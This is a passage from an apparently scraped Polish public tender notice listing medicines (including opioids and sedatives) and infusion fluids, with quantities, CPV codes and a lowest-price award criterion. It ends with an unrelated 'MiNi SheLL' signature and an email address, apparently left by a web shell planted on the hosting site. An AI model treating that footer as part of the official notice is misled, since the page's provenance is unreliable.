6.	Alcainum krople oczne 1 flakon x 15 ml	op.	15
7.	Atropini sulfas  inj. 1mg/1ml x 10amp.	op.	300
8.	Aqua pro injectione 10 ml  x 100 amp ( plastik)	op.	10
9.	Benzinum  1000ml x 1 op.	op.	10
10.	Metoprololum inj.  1mg/ml x 5amp	op.	50
11.	Captoprilum  tabl.12,5 mg x 30 tabl	op.	400
12.	Carbo medicinalis tab. 300 mg x 20 tabl.	op.	20
13.	Cardiamid krople 1 flakon x 15 ml 	op.	10
14.	Chloramphenicolum  ung. 2%  1 op. x 5g 	op.	100
15.	Clemastini fumuras inj. 1 mg/ml x 5 amp	op.	150
16.	Clonazepamum inj 1ml/mg x 10amp.	op.	200
17.	Dexamethasonum inj 4mg/1ml x 10amp.	op.	300
18.	Dexamethasonum inj 8mg/2ml x 10amp.	op.	400
19.	Diazepamum inj.  5 mg/ml x 50 amp	op.	15
20.	Diazepamum wlewki doodbytnicze 5mg / 2,5 ml x 5 wlewek	op.	30
21.	Dobutamini hydrochloridum  250 mg subst. sucha x 1 amp.	szt.	100
22.	Dopamini hydrochloridum 4 % inj 40 mg/ ml x 10 amp	op.	70
23.	Drotaverini hydrochloridum inj. 40 mg/2ml x 5 amp.	op.	400
24.	Drotaverini hydrochloridum tabl. 40mg x 20 tabl.	op.	50
25.	Ephedrini hydrochloridum   inj. 25mg /ml x 10 amp.	op.	15
26.	Etomidate 20mg/10 ml x 5 amp 	op.	20
27.	Ethacridini lactas żel 5 mg/g   1 tuba x 30 g 	op.	50
28.	Fentanylum inj. 0,1mg/2ml x 50 amp	op.	5
29.	Flumazenilum inj. 0,1 mg/ml x 5 amp	op.	4
30.	Furosemidum 20 mg /2ml x 5 amp	op.	700
31.	Gentamicinum inj iv/im 80mg/2ml  x 10amp.	op.	30
32.	Glucagoni hydrochloridum  1mg subs. sucha +  1 szt. strzykawka 	op.	150
33.	Glyceroli trinitras tabl.podjęz. 0,5mg x 20 tabl.	op.	250
34.	Glyceroli trinitras aerozol 0,4 mg/ dawkę x 200 dawek / 1 op.	op.	40
35.	Glyceroli trinitras inj .0,01/10ml x 10amp.	op.	5
36.	Heparinum inj. 5 000 j./ ml x 10 amp.	op.	15
37.	Hydrocortisonum 100mg amp. 5 + 5amp. rozpuszczalnika	op.	450
38.	Hydroxyzini hydrochloridum tabl. 25 mg x 30 tabl.	op.	250
39.	Hydroxyzini hydrochloridum tabl. 10 mg x 30 tabl.	op.	200
40.	Kalii  chloridum  15% 20 ml x 10 amp.	op.	5
41.	Ketoprofenum 100mg/2ml x 10amp.	op.	700
42.	Krople żołądkowe 1 flakon x 35 g 	op.	20
43.	Lidocainum inj  2% 20 ml x 5 amp.	op.	80
44.	Lidocainum  żel 2%   typ U 1 tuba x 30 g	op.	150
45.	Lidocainum żel 2%, typ A 1 tuba x 30 g	op.	150
46.	Loperamidum  tab. 2mg x 10 tabl	op.	10
47.	Magnesium sulfate inj 20%  10 ml x 10 amp	op.	50
48.	Metamizolum natricum inj. 2,5 g/ 5 ml x 5 amp 	op.	350
49.	Metamisolum natricum tabl. 500 mg x 10 tabl	op.	100
50.	Metamisolum natricum czopki 750 mg x 5 szt.	op.	40
51.	Methylprednisolonum inj. 500mg x 1 amp. + 1amp. rozpuszczalnika (8 ml) / 1 kompl.	op.	50
52.	Metoclopramidum 10mg/2 ml x 5 amp	op.	400
53.	Metoprololum tabl. 50mg x 30tabl.	op.	30
54.	Midazolamum 5mg/ml x10 amp.	op.	75
55.	Morphinum 10mg/1ml x 10 amp	op.	100
56.	Naloxoni hydrochloridum inj 0,4 mg /1ml x10 amp	op.	40
57.	Natrii chloridum.0,9% 10ml x100 amp (opakowania plastikowe)	op.	300
58.	Natrii hydrocarbonas inj. 8,4% 20 ml x 10 amp. 	op.	50
59.	Nifuroxazidum tabl.100mg x 24 tabl.	op.	20
60.	Norepinephrini bitartras 1mg/1ml x 10 amp.	op.	15
61.	Paracetamolum czopki 125 mg x 10 sztuk.	op.	40
62.	Paracetamolum czopki 50mg x 10 sztuk	op.	40
63.	Paracetamolum  tabl 500mg x 20 tabl	op.	60
64.	Paski do glukomertu Optium Xido x 50 szt	op.	350
65.	Petidinum inj 50mg/ml x10 amp.	op.	15
66.	Phenobarbitalum  czopki 15mg x10 sztuk	op.	15
67.	Propranololum 10mg x 50 tabl.	op.	50
68.	Salbutamolum amp. do nebulizacji 2,5mg/2,5ml x 20 amp.	op.	100
69.	Salbutamolum inj. 0,5mg/1ml x 10 amp.	op.	50
70.	Sulfathiazolum argentum 20 mg/g 1 tuba x 40 g kremu 	op.	15
71.	Sulfathiazolum argentum 20 mg/g  1 op. x 400 g kremu	op.	5
72.	Spasmalgon /prep.złoż/ 5ml x 10 amp.	op.	150
73.	Spirytus skaż.hibitanem 70%  1000 ml / 1 op.	op.	50
74.	Suxamethonium  chloride 200 mg x 10 amp.	op.	15
75.	Thiethylperazinum 6,5 mg/ ml  x 5 amp	op.	120
76.	Thiopentalum natricum  0,5g x 1 amp	szt.	150
77.	Tramadolum 100mg/2ml x 5 amp.	op.	150
78.	Urapidilum  0,025/5ml x 5 amp	op.	50
79.	Verapamil 2,5mg/ml x 5 amp.	op.	50
80.	Vercuronium bromide inj. 4mg/1ml  1amp + 1 amp.rozp. x 10 kompl.	op.	15
81.	Biologiczny wskaźnik kontroli procesu sterylizacji (Sporal A) x 10 szt	op.	5
82.	Antytoksyna jadu żmiji 500j.m. x 1 amp	szt.	10
83.	Glicerynum 86% x 1000 g / op.	op.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.	Część nr 2 zamówienia : dostawa płynów infuzyjnych, zgodnie z  wykazem asortymentowym  
i ilościowym określonym w tabeli nr 3 załącznika nr 4a do niniejszej siwz, CPV - 24 40 00 00.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik nr 4 do SIWZ	
Część nr  2 zamówienia : Tabela nr 2 -  PŁYNY INFUZYJNE 						Załącznik nr 1 do umowy	
Lp.	Nazwa przedmiotu zamówienia	Ilość w szt.
1	2	5
1.	Płyn koloidowy 3-4% 500ml 	400
2.	Aqua pro injectione 250 ml ( opakowanie: worek z dwoma portami )	30
3.	Hydroxyetylowana skrobia 10% 500ml	150
4.	Mannitol 20% 250 ml ( opakowanie worek )	150
5.	Glukoza 5 % 500 ml ( butelka plastikowa z dwoma portami )	100
6.	Glukoza 5 % 250 ml ( butelka plastikowa z dwoma portami )	650
7.	Glukoza 5 % 100 ml ( butelka plastikowa z dwoma portami )	250
8.	Glukoza 10 % 250 ml ( butelka plastikowa z dwoma portami )	1000
9.	Theophyllinum 250ml	350
10.	Natrium chloratum 0,9% 250ml ( butelka plastikowa z dwoma portami )	4000
11.	Natrium chloratum 0,9% 500ml ( butelka plastikowa z dwoma portami )	2500
12.	Płyn wieloelektrolitowy 250ml ( butelka plastikowa z dwoma portami )	1500
13.	Płyn wieloelektrolitowy 500ml ( butelka plastikowa z dwoma portami )	1000
14.	Roztwór Ringera 250ml (butelka plastikowa z dwoma portami )	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.40.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com